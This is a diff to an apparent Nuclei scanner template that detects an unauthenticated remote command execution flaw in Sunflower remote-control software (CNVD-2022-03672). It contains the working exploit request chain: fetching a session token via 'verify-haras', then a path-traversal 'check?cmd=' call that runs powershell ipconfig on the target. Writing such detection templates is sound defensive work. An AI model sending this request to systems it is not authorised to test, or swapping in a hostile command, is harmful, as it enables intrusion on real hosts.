--- a/cnvd/2022/CNVD-2022-03672.yaml
+++ b/cnvd/2022/CNVD-2022-03672.yaml
@@ -9,7 +9,7 @@ info:
     - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
     - https://www.1024sou.com/article/741374.html
     - https://copyfuture.com/blogs-details/202202192249158884
-  tags: sunflower,cnvd
+  tags: cnvd,cnvd2020,sunflower
 
 requests:
   - raw:
@@ -18,19 +18,18 @@ requests:
         Host: {{Hostname}}
 
         action=verify-haras
-
-  - raw:
       - |
         GET check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
         Host: {{Hostname}}
         Cookie: CID={{cid}}
 
+    extractors:
       - type: regex
-        regex:
-          - '"verify_string":"(?.*)"'
-        internal: true
         name: cid
         group: 1
+        regex:
+          - '"verify_string":"(.*)'
+        internal: true
 
     req-condition: true
     matchers:
@@ -38,5 +37,6 @@ requests:
         dsl:
           - "status_code_1==200"
           - "status_code_2==200"
+          - "contains(body_1, 'verify_string')"
           - "contains(body_2, 'Windows IP')"
         condition: and
